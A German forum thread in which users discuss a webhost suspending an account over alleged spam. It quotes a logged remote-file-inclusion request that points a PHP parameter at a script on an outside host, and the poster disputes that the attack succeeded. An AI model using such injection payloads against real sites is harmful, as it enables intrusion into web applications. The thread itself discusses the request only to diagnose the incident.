Neuigkeiten:

still alive...

Hauptmenü

Merkwürdiges Security Issue

Begonnen von Powie, 08. Juli 2010, 08:45:08

Vorheriges Thema - Nächstes Thema

Powie

Ich möchte gern einmal eure Meinung hören zu dem folgenden Vorfall. Einer unserer Anwender hat eine Account Sperre seines Webspace hinnehmen müssen weil angeblich tausende Spam Mails verschickt wurden. Dazu gab es diese EMail des Webhosters, die ich beim ersten Lesen für vollkommenen Sinnlos halte:
 
In den access_log Ihres Accounts wurden folgende Einträge gefunden:
- - [05/Jul/2010:00:07:52 +0200] \"GET /forum_d/edituser.php?boardid=http://amyru.h18.ru/images/cs.txt?
HTTP/1.1\" 200 24187 \"-\" \"Wget/1.1 (compatible; i486; Linux; RedHat7.3)\"
 
Folgende Skripte/Ordner wurden von uns per Chmod 000 gesperrt:
/tmp/.ICE
Bitte schalten Sie diese Skripte nicht einfach wieder frei, sondern prüfen mit
den Entwicklern, wie es zu diesen Sicherheitslücken innerhalb des Skriptes
kommen konnte. Ggf. verwenden Sie hier auch veralte Versionen mit bekannten
Sicherheitslücken.
[/quote]
Dazu habe ich zwei Argumente:
1. Ein solcher Angriff auf die edituser.php führt zu nichts, da dort die boardid  sowieso nicht verabreitet wird.
2. Die Datei /tmp/.ICE hat mit dem Webuser garnichts zu tun, die gehört im Original zum X System.....
3. Vergleichbare Anfragen finden sich in allen access_logs, auch in meinen eigenen, das sind Bots die das Internet scannen und versuchen Einbruchsstellen ausfindig zu machen.

Powie

Ich habe mittlerweile das access_log aus dem Zeitraum im Zugriff. Die genannte Zeile aus dem access_log kommt genau einmal vor.....  (!)

adminfrank

Gemerkt hab ich davon noch nichts, also bei mir wierden keine Mails versendet, das einzige was ich habe ist, das ich persönlich zig Spammails bekomme.

Powie

Spam bekämpft man mit Googlemail  /uploads/emoticons/icon_e_biggrin.gif.1a84f5257b36e14b36d04985314f877f.gif\" alt=\":-D\" />

raiser

Nö, den gebe ich nichts in die Hand...
/uploads/emoticons/icon_e_wink.gif.fcb053ab2c91cb6224c03a16c6332abf.gif\" alt=\";)\" />

Wissen ist das einzige Gut, dass sich vermehrt, wenn man es teilt! (Marie von Ebner-Eschenbach)




Irren ist menschlich!




Wer andern eine Grube gräbt,


sollte darüber nachdenken,


ob sie tief genug ist!!!!




Kameradschaft ist, wenn der


Kamerad schafft !!!!


all your base are belong to us